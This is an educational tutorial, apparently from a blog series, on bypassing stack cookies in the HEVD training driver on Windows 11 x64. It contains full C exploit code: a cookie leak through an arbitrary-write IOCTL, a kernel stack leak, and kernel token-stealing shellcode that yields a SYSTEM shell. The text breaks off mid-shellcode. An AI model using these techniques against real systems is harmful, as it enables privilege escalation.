In the last tutorial we exploited one of the most notorious bug classes in the entire industry - Race Conditions.

In this tutorial we’re going back to a bug class we have exploited before - The Stack Overflow. However, this time we’ll be encountering an exploit mitigation known as stack cookies or canaries. That said, we’ll be skipping Windows 7 (x86) and jumping directly into Windows 11 (x64).

It’s important to note that the core issue in relation to the security vulnerability HAS NOT changed; we’ll still be exploiting a Stack Overflow.

Let’s jump into a high-level overview :)

Table of Contents
#

What are Stack Cookies (High Level)
Reverse Engineering
- Crafting a PoC
- Mitigation Analysis
Baking Cookies
Exploitation
Sources

What are Stack Cookies (High Level)
#

Cookies are likely one of your favorite sugary snacks. In the context of Cyber Security, however, the term is used by exploit developers for a security mitigation designed to detect stack-based buffer overflows (often just called stack overflows) before they can be used to hijack execution. Before diving into any technical details, this is best understood with a high-level overview.

Imagine you have just gone to a family outing and brought chocolate chip cookies from the store for others to eat. These cookies are from REDACTED so everyone is excited to dig in!

However, your aunt makes it clear: “everyone must eat dinner before dessert”. Little do you know, your aunt is jealous. Your cookies have become the star of the show! Since you let her know hours before arriving that you would be bringing these cookies, she baked a batch indistinguishable from REDACTED’s cookies.

However, she’s added one extra ingredient…

With everyone distracted eating dinner, your aunt swaps the cookies you brought for her own. It looks like her carne asada will once again be the star of the cookout.

Once everyone has finished their meals, they go in for some delicious chocolate chip cookies. However, it looks like your aunt’s plan has failed, since everyone immediately tastes the raisins, and REDACTED does not make raisin cookies!

How does this relate to exploit mitigations?

In this scenario you and your family would be the stack / operating system (OS) and the cookies would be the stack cookies (or canary).
Your aunt would be the attacker.
The cookie swap could be looked at as the stack overflow.
Since these cookies are unique (chocolate chip), you and your family can easily tell that the swapped cookies are not from REDACTED.

In a very similar fashion this is what the exploit mitigation does.

You see, when you exploit a stack overflow you are corrupting memory; this includes variables, structures, etc. With this mitigation, a “cookie” (a value) is placed on the stack between the local buffers and the saved return address.

When a protected function is about to return, and before execution is directed to the saved return address, it performs a check to ensure the cookie (value) has not been corrupted (assuming the mitigation is enabled). Should the check detect that this value was modified, the application is terminated (or, in kernel mode, the system bug checks). Either way we get a crash, but not one that benefits an attacker.

If we cannot find a way to prevent this from happening (e.g., by using a leak), we will more than likely not be able to exploit this vulnerability.

Of course, there are many ways to bypass any mitigation and today we will be doing just that!

In fact, you may already be thinking “what if our aunt used chocolate chips and not raisins”?
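The check described above can be simulated entirely in user mode. The following is a minimal sketch and not how the compiler really lays out a frame: fake_frame_t, copy_and_check() and BUF_SIZE are hypothetical names, and the frame is modeled as a struct so the “overflow” never leaves memory we own.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 16 /* hypothetical size of the local buffer */

/* Simulated stack frame: local buffer, then the cookie, then the saved
   return address (lowest address first). */
typedef struct {
  uint8_t  buffer[BUF_SIZE];
  uint64_t cookie;
  uint64_t return_address;
} fake_frame_t;

/* Copies len bytes into the frame starting at buffer. The copy is bounded by
   the size of the whole frame, not by BUF_SIZE, so it can spill into the
   cookie and the return address. Returns 1 if the cookie survived. */
int copy_and_check(fake_frame_t *frame, uint64_t secret,
                   const uint8_t *src, size_t len)
{
  assert(len <= sizeof(*frame));

  frame->cookie = secret;           /* "prologue": place the cookie       */
  frame->return_address = 0x1000;   /* placeholder for the real address   */

  memcpy((uint8_t *)frame, src, len); /* the unchecked copy               */

  return frame->cookie == secret;   /* "epilogue": verify before returning */
}
```

Copying BUF_SIZE bytes leaves the cookie intact. Copying a whole frame of 0x41 bytes changes the cookie, so the check fails. If the input carries the correct cookie value at offset BUF_SIZE (the aunt using chocolate chips), the check passes even though the return address has been overwritten.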

Reverse Engineering
#

As with previous vulnerabilities we’ll need to gather information prior to starting exploitation: the IOCTL code (0x222007) and the vulnerable function. This is pretty easy to spot since HEVD comes with symbols and functions conveniently named so we can learn more about these bug classes.

Based on the decompilation shown above we won’t be dealing with any custom structures, meaning we can proceed to take a look at the TriggerBufferOverflowStackGS function.

Looking at the above decompilation, we can see that the cookie gets stored in the pseudo variable local_38, then we call __security_check_cookie() when exiting the function. As for the core vulnerability - we know this is a vanilla buffer overflow because memcpy() copies a buffer of any size into the pseudocode array variable local_238[]. Let’s go ahead and craft a proof of concept to see what happens when we trigger this vulnerability.
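As a side note, the IOCTL code quoted at the start of this section can be split into its fields. The sketch below re-implements the bit layout of the Windows CTL_CODE macro so it compiles without the Windows headers; SKETCH_CTL_CODE, ioctl_fields_t and decode_ioctl() are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Same bit layout as the CTL_CODE macro from the Windows headers:
   DeviceType << 16 | Access << 14 | Function << 2 | Method */
#define SKETCH_CTL_CODE(dev, func, method, access)            \
  (((uint32_t)(dev) << 16) | ((uint32_t)(access) << 14) |     \
   ((uint32_t)(func) << 2) | (uint32_t)(method))

typedef struct {
  uint32_t device_type; /* 0x22 is FILE_DEVICE_UNKNOWN */
  uint32_t access;      /* 0 is FILE_ANY_ACCESS        */
  uint32_t function;    /* driver-defined function ID  */
  uint32_t method;      /* 3 is METHOD_NEITHER         */
} ioctl_fields_t;

/* Splits a 32-bit IOCTL code back into its four fields. */
ioctl_fields_t decode_ioctl(uint32_t code)
{
  ioctl_fields_t fields;

  assert(code != 0);
  fields.device_type = code >> 16;
  fields.access      = (code >> 14) & 0x3;
  fields.function    = (code >> 2) & 0xfff;
  fields.method      = code & 0x3;

  return fields;
}
```

Decoding 0x222007 gives device type 0x22, function 0x801, method 3 (METHOD_NEITHER) and access 0. The Arbitrary Write IOCTL used later in this post (0x22200b) decodes the same way, with function 0x802.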

Crafting a PoC
#

Since we’re dealing with a vanilla stack overflow there’s no need to really overcomplicate this. Let’s dish out a PoC!

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007

/* Exploit Settings */
#define ALLOCATION_SIZE 0x1000

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}


/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
  size_t i = 0;
  uint64_t *payload = (uint64_t *)lpvBuffer;

  for (i = 0; i < ALLOCATION_SIZE; i += sizeof(uint64_t))
    *payload++ = 0x41414141;

  return i;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;
  LPVOID lpvMemoryAlloc = NULL;

  lpvMemoryAlloc = VirtualAlloc(NULL,
                                ALLOCATION_SIZE,
                                (MEM_COMMIT | MEM_RESERVE),
                                PAGE_EXECUTE_READWRITE);
  if (lpvMemoryAlloc == NULL)
  {
    printf("[*] Failed to create exploitation buffer\n");
    return -1;
  }

  dwExploitBuffer = GenerateExploitBuffer(NULL, lpvMemoryAlloc);
  printf("[*] Exploit buffer size: %d\n", dwExploitBuffer);

  DeviceIoControl(hHEVD,
                  STACK_OVERFLOW_GS_IOCTL,
                  lpvMemoryAlloc,
                  dwExploitBuffer,
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);

  return CheckWin();
}

int main()
{
  HANDLE hHEVD = NULL;
  hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                      (GENERIC_READ | GENERIC_WRITE),
                      0x00,
                      NULL,
                      OPEN_EXISTING,
                      FILE_ATTRIBUTE_NORMAL,
                      NULL);

  if (hHEVD == INVALID_HANDLE_VALUE) /* CreateFileA() signals failure with INVALID_HANDLE_VALUE, not NULL */
  {
    printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
    return -1;
  }

  if (Exploit(hHEVD) == 0) {
    printf("[*] Exploitation success!!! Enjoy de shell!!\n\n");
    system("cmd.exe");
  } else {
    printf("[-] Exploitation failed, run again\n");
  }

  if (hHEVD != INVALID_HANDLE_VALUE) {
    CloseHandle(hHEVD);
  }
}

Once sent, we get a crash :)

However, taking a closer look at the crash, we can see we have encountered the stack cookie / canary mitigation.

Mitigation Analysis
#

Looking at the cookie initialization we can see that the __security_cookie is stored within HEVD at HEVD+0x3000 (we can also confirm this in Ghidra). In addition, we can see that the __security_cookie is XOR’d with the value currently stored in RSP. Once complete, the result of the XOR operation is stored at RSP+0x220, which is essentially an offset into the stack. Without looking at this further, we can assume that if we overwrite the value stored at RSP+0x220 we’ll trigger the mitigation.

If we re-launch the exploit and break at the start of TriggerBufferOverflowStackGS, we can confirm the cookie is stored in HEVD’s memory:

We further confirm this when we get to the XOR operation. As shown below, the value being XOR’d is simply the current stack address, NOT a hardcoded value of some sort.

If we step once more, we can see this new value stored in RAX will be placed onto the stack. What if we restored this value after corrupting it?

You may have issues during analysis with such a large buffer, so go ahead and decrease the buffer size to 0x900 bytes. Once done, re-run the experiment above and run !analyze -v. This time our final cookie after the XOR operation is ffff40da07033567 and RSP+0x220 points to ffffe58347db76f0. With that, we can set a breakpoint at HEVD+0x867b9. If we continue execution from this point, we can see we take a jump; if we continued further (we won’t), we’d end up calling the __security_check_cookie() function. If we dump the address where the cookie was stored, we can see we have corrupted it. However, if we restore it and continue…

We get control over the instruction pointer :)

This gives us a solid high-level overview on how we can bypass this mitigation.
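The XOR relationship from this section can be written down as a small worked example. This is a sketch under two assumptions: the two debugger values quoted above were captured in the same run, and RSP at the time of the XOR equals the cookie slot address minus 0x220. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define COOKIE_SLOT_OFFSET 0x220 /* the cookie is stored at RSP+0x220 */

/* Prologue: the value the function stores in its own frame. */
uint64_t make_frame_cookie(uint64_t security_cookie, uint64_t rsp)
{
  return security_cookie ^ rsp;
}

/* XOR is its own inverse, so the frame cookie and the address of its slot
   are enough to recover the global __security_cookie. */
uint64_t recover_security_cookie(uint64_t frame_cookie, uint64_t slot_address)
{
  uint64_t rsp = 0;

  assert(slot_address >= COOKIE_SLOT_OFFSET);
  rsp = slot_address - COOKIE_SLOT_OFFSET;

  return frame_cookie ^ rsp;
}
```

With the values from the debugger session, the slot at ffffe58347db76f0 puts RSP at ffffe58347db74d0, and XORing that with ffff40da07033567 gives 0000a55940d841b7. Going the other way, make_frame_cookie() with that cookie and that RSP reproduces ffff40da07033567, which is the value we would need to write back into the slot.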

Baking Cookies
#

So as with other exploits we’ve written throughout this HEVD “course”, you may be thinking this would be as simple as getting the base address of HEVD and reading the memory location where the cookie is located. However, we quickly (and stubbornly) learned this was not the case: we cannot read kernel memory directly from userland, so we need a leak. In our case we can re-use the Write-What-Where / Arbitrary Write vulnerability…
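The reason an arbitrary write doubles as a leak is easier to see in a user-mode simulation. The sketch below assumes the handler copies one 8-byte value from *What to *Where, which is how the PoC uses it; simulated_arbitrary_write() is a hypothetical stand-in for the driver, not its real code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirrors the shape of the request structure passed to the driver. */
typedef struct {
  uint64_t *what;  /* address the value is read from   */
  uint64_t *where; /* address the value is written to  */
} www_request_t;

/* Stand-in for the vulnerable handler: *where = *what, no validation. */
void simulated_arbitrary_write(const www_request_t *req)
{
  assert(req != NULL && req->what != NULL && req->where != NULL);
  *req->where = *req->what;
}

/* Point "what" at the secret and "where" at our own variable: the write
   primitive now behaves like a read primitive. */
uint64_t leak_qword(uint64_t *secret_location)
{
  uint64_t leaked = 0;
  www_request_t req = { secret_location, &leaked };

  simulated_arbitrary_write(&req);

  return leaked;
}
```

In the real exploit, the secret location is the kernel address HEVD+0x3000 and the destination is a variable in our own process, so the driver does the kernel read on our behalf.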

Let’s write a PoC and test it.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007
#define ARBITRARY_WRITE_IOCTL 0x22200b

/* Structure used by Write-What-Where */
typedef struct _WRITE_WHAT_WHERE
{
  uint64_t *ullpWhat;
  uint64_t *ullpWhere;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

/* Exploit Settings */
#define ALLOCATION_SIZE 0x900

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}


/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
  size_t i = 0;
  uint64_t *payload = (uint64_t *)lpvBuffer;

  for (i = 0; i < ALLOCATION_SIZE; i += sizeof(uint64_t))
    *payload++ = 0x41414141;

  return i;
}

/* WriteBytes():
     Arbitrary write located in the TriggerArbitraryWrite() function */
void WriteBytes(HANDLE hHEVD, uint64_t* u64What, uint64_t* u64Where)
{
  DWORD dwBytesReturned = 0;
  WRITE_WHAT_WHERE www = { 0 };

  www.ullpWhere = u64Where;
  www.ullpWhat = u64What;

  printf("\t[*] Writing 0x%p to 0x%p\n", www.ullpWhat, www.ullpWhere);

  DeviceIoControl(hHEVD,
                  ARBITRARY_WRITE_IOCTL,
                  &www,
                  sizeof(WRITE_WHAT_WHERE),
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);
}

/* LeakCookie():
     Leverage the ARBITRARY_WRITE_IOCTL to write to our variable in Userland from
     Kernel Land. */
uint64_t LeakCookie(HANDLE hHEVD, LPVOID lpvHEVD)
{
  uint64_t cookie = 0;
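  /* Cast to a byte pointer first; arithmetic on a void pointer is a compiler extension */
  uint64_t *pu64Cookie = (uint64_t *)((uint8_t *)lpvHEVD + 0x3000);

  printf("\t[*] Cookie located @{0x%p}\n", pu64Cookie);
  WriteBytes(hHEVD, pu64Cookie, &cookie);

  printf("\t[+] Cookie leaked: 0x%llx\n", (unsigned long long)cookie);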

  return cookie;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;
  
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");

  if (lpvHEVD == NULL) {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }
  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);

---snip---
}

Once launched, we successfully leaked the stack cookie!

However, we still need to leak the stack… I was pretty stuck… until I came across another great post by Kristal-G where the use of a leak from sam-b came in handy.

Let’s once again code this and test it!

void LeakStack(wchar_t *targetPoC)
{
  HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
  PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
  if (query == NULL) {
    printf("GetProcAddress() failed.\n");
    exit(-1);
  }

  ULONG len = 2000;
  NTSTATUS status = 0x00;
  PSYSTEM_EXTENDED_PROCESS_INFORMATION pProcessInfo = NULL;
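  do {
    len *= 2;
    if (pProcessInfo != NULL) {
      GlobalFree(pProcessInfo); /* release the previous, too-small buffer */
    }
    pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (pProcessInfo == NULL) {
      printf("GlobalAlloc() failed.\n");
      exit(-1);
    }
    status = query(SystemExtendedProcessInformation, pProcessInfo, len, &len);
  } while (status == (NTSTATUS)0xc0000004); /* STATUS_INFO_LENGTH_MISMATCH */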
  
  if (status != (NTSTATUS)0x0) {
    printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
    exit(-1);
  }

  while (pProcessInfo->NextEntryOffset != 0x00) {
    // Strangely I was able to do this with the pProcessInfo->ImageName.Buffer being NULL? 
    if (StrStrW(pProcessInfo->ImageName.Buffer, targetPoC) != NULL || pProcessInfo->ImageName.Buffer == NULL) {
      printf("[*] Leaking stack from %ls\n", targetPoC);
      for (unsigned int i = 0; i < pProcessInfo->NumberOfThreads; i++) {
        LPVOID stackBase = pProcessInfo->Threads[i].StackBase;
        LPVOID stackLimit = pProcessInfo->Threads[i].StackLimit;
#ifdef _WIN64
        printf("\tStack base 0x%p\tStack limit 0x%p\n", stackBase, stackLimit);
#else
        printf("\tStack base 0x%X\t", stackBase);
        printf("\tStack limit 0x%X\r\n", stackLimit);
#endif
        break;
      }
    }

    if (!pProcessInfo->NextEntryOffset) {
      pProcessInfo = NULL;
    } else {
      pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + pProcessInfo->NextEntryOffset);
    }
  }
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;

  LPVOID lpvStackLeak = NULL;
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");

  if (lpvHEVD == NULL) {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }
  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);

  LeakStack(L"poc.exe");
  getchar();
---snip---
}

As you can see from our source code, we had a lot of trouble locating the target process. Strangely, the check only worked once we also accepted entries where pProcessInfo->ImageName.Buffer was NULL.

We can further confirm this with GDB.

With that we should have everything we need to exploit this bug :)
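Putting the two leaks together, the value we need to place in the cookie slot can be computed ahead of time. The sketch below assumes that RSP inside TriggerBufferOverflowStackGS sits 0xb30 bytes below the leaked stack base, which is the adjustment the final PoC applies; that offset is specific to the build being targeted, and forge_frame_cookie() is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_BASE_TO_RSP 0xb30 /* offset used by the final PoC; build specific */

/* Reproduces what the function prologue will compute: cookie XOR RSP. */
uint64_t forge_frame_cookie(uint64_t security_cookie, uint64_t stack_base)
{
  uint64_t rsp = 0;

  assert(stack_base > STACK_BASE_TO_RSP);
  rsp = stack_base - STACK_BASE_TO_RSP;

  return security_cookie ^ rsp;
}
```

As a sanity check against the Mitigation Analysis values: a stack base of ffffe58347db8000 (inferred here for illustration, not taken from the debugger output) minus 0xb30 is ffffe58347db74d0, the same RSP implied by the cookie slot address. XORing that with 0000a55940d841b7, the value the debugger numbers XOR back to, gives ffff40da07033567, the frame cookie observed earlier.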

Exploitation
#

Below is the final PoC code:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <wchar.h>

#include <windows.h>
#include <psapi.h>
#include <shlwapi.h>

typedef LONG KPRIORITY;

typedef struct _CLIENT_ID {
  DWORD          UniqueProcess;
  DWORD          UniqueThread;
} CLIENT_ID;

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
#ifdef MIDL_PASS
  [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
  _Field_size_bytes_part_opt_(MaximumLength, Length) PWCH   Buffer;
#endif // MIDL_PASS
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

//from http://boinc.berkeley.edu/android-boinc/boinc/lib/diagnostics_win.h
typedef struct _VM_COUNTERS {
  // the following was inferred by painful reverse engineering
  SIZE_T                   PeakVirtualSize;     // not actually
  SIZE_T         PageFaultCount;
  SIZE_T         PeakWorkingSetSize;
  SIZE_T         WorkingSetSize;
  SIZE_T         QuotaPeakPagedPoolUsage;
  SIZE_T         QuotaPagedPoolUsage;
  SIZE_T         QuotaPeakNonPagedPoolUsage;
  SIZE_T         QuotaNonPagedPoolUsage;
  SIZE_T         PagefileUsage;
  SIZE_T         PeakPagefileUsage;
  SIZE_T         VirtualSize;           // not actually
} VM_COUNTERS;

typedef enum _KWAIT_REASON
{
  Executive = 0,
  FreePage = 1,
  PageIn = 2,
  PoolAllocation = 3,
  DelayExecution = 4,
  Suspended = 5,
  UserRequest = 6,
  WrExecutive = 7,
  WrFreePage = 8,
  WrPageIn = 9,
  WrPoolAllocation = 10,
  WrDelayExecution = 11,
  WrSuspended = 12,
  WrUserRequest = 13,
  WrEventPair = 14,
  WrQueue = 15,
  WrLpcReceive = 16,
  WrLpcReply = 17,
  WrVirtualMemory = 18,
  WrPageOut = 19,
  WrRendezvous = 20,
  Spare2 = 21,
  Spare3 = 22,
  Spare4 = 23,
  Spare5 = 24,
  WrCalloutStack = 25,
  WrKernel = 26,
  WrResource = 27,
  WrPushLock = 28,
  WrMutex = 29,
  WrQuantumEnd = 30,
  WrDispatchInt = 31,
  WrPreempted = 32,
  WrYieldExecution = 33,
  WrFastMutex = 34,
  WrGuardedMutex = 35,
  WrRundown = 36,
  MaximumWaitReason = 37
} KWAIT_REASON;

typedef struct _SYSTEM_THREAD_INFORMATION {
  LARGE_INTEGER KernelTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER CreateTime;
  ULONG WaitTime;
  PVOID StartAddress;
  CLIENT_ID ClientId;
  KPRIORITY Priority;
  LONG BasePriority;
  ULONG ContextSwitchCount;
  ULONG ThreadState;
  KWAIT_REASON WaitReason;
#ifdef _WIN64
  ULONG Reserved[4];
#endif
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;

typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION
{
  SYSTEM_THREAD_INFORMATION ThreadInfo;
  PVOID StackBase;
  PVOID StackLimit;
  PVOID Win32StartAddress;
  PVOID TebAddress; /* This is only filled in on Vista and above */
  ULONG Reserved1;
  ULONG Reserved2;
  ULONG Reserved3;
} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;

typedef struct _SYSTEM_EXTENDED_PROCESS_INFORMATION
{
  ULONG NextEntryOffset;
  ULONG NumberOfThreads;
  LARGE_INTEGER SpareLi1;
  LARGE_INTEGER SpareLi2;
  LARGE_INTEGER SpareLi3;
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ImageName;
  KPRIORITY BasePriority;
  ULONG ProcessId;
  ULONG InheritedFromUniqueProcessId;
  ULONG HandleCount;
  ULONG SessionId;
  PVOID PageDirectoryBase;
  VM_COUNTERS VirtualMemoryCounters;
  SIZE_T PrivatePageCount;
  IO_COUNTERS IoCounters;
  SYSTEM_EXTENDED_THREAD_INFORMATION Threads[1];
} SYSTEM_EXTENDED_PROCESS_INFORMATION, *PSYSTEM_EXTENDED_PROCESS_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemExtendedProcessInformation = 57
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI *PNtQuerySystemInformation)(
  __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
  __inout PVOID SystemInformation,
  __in ULONG SystemInformationLength,
  __out_opt PULONG ReturnLength
);

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007
#define ARBITRARY_WRITE_IOCTL 0x22200b

/* Structure used by Write-What-Where */
typedef struct _WRITE_WHAT_WHERE
{
  uint64_t *ullpWhat;
  uint64_t *ullpWhere;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

/* Exploit Settings */
#define ALLOCATION_SIZE 0x900

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}

/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvStackLeak, uint64_t cookie, LPVOID lpvBuffer)
{
  size_t j = 0;
  size_t i = 0;
  LPVOID shellcode = NULL;
  uint64_t nt = (uint64_t)(lpvNt);
  uint64_t stack = (uint64_t)(lpvStackLeak);
  uint64_t *payload = (uint64_t *)(lpvBuffer);

  uint8_t sc[129] = {
  // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes)
  0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 
  0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04, 
  0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00, 
  0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04, 
  0x00, 0x00,
 
  // sickle-tool -p windows/x64/kernel_sysret -f num (71)
  0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88, 
  0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 
  0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 
  0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 
  0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 
